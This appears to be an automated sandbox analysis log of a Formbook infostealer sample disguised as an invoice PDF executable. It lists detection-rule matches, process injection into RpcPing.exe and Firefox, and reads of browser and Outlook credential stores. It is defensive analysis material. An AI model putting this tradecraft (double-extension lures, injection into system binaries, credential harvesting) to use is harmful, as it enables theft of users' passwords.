            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058E8F899_2_058E8F89
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058C87FF9_2_058C87FF
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058C86B99_2_058C86B9
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058C86B69_2_058C86B6
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058CA6399_2_058CA639
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 9_2_058D2AF99_2_058D2AF9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: String function: 01A9F290 appears 103 times
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: String function: 01A55130 appears 58 times
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: String function: 01A67E54 appears 107 times
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: String function: 01A0B970 appears 262 times
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: String function: 01A8EA12 appears 86 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 03A8EA12 appears 86 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 03A0B970 appears 262 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 03A67E54 appears 107 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 03A55130 appears 58 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 03A9F290 appears 103 times
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000000.1663240818.00000000002DE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHx.exe2 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1688616532.00000000008EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693835243.0000000007420000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeBinary or memory string: OriginalFilenameHx.exe2 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, J1Np7SeHlsncQgvjqU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, J1Np7SeHlsncQgvjqU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, J1Np7SeHlsncQgvjqU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@5/4
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORIGINAL INVOICE COAU7230734298.pdf.exe.logJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\RpcPing.exeFile created: C:\Users\user\AppData\Local\Temp\297268BLQJump to behavior
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RpcPing.exe, 00000008.00000003.2435255903.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432168414.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2431409420.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432933782.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2431030399.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432548929.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2929881128.00000000033E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeVirustotal: Detection: 38%
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeReversingLabs: Detection: 28%
            Source: unknownProcess created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: credui.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: Hx.pdbSHA256 source: ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fFUkGixTNm.exe, 00000007.00000002.2930068881.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp, fFUkGixTNm.exe, 00000009.00000002.2929589735.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Hx.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, frmListContacts.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.3682450.2.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs.Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs.Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs.Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.6b70000.4.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.366a230.1.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
            Source: 8.2.RpcPing.exe.40bcd14.2.raw.unpack, frmListContacts.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 9.2.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 9.0.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 10.2.firefox.exe.31d5cd14.0.raw.unpack, frmListContacts.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeStatic PE information: 0xAFFFFCB7 [Fri Jul 27 19:12:55 2063 UTC]
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 0_2_070E9DED push FFFFFF8Bh; iretd 0_2_070E9DEF
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_0040D0CA push edi; ret 3_2_0040D0CC
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_00416166 pushfd ; iretd 3_2_004161E5
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_00417984 push esp; iretd 3_2_0041798A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_00413B46 push eax; iretd 3_2_00413B71
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_00413B62 push eax; iretd 3_2_00413B71
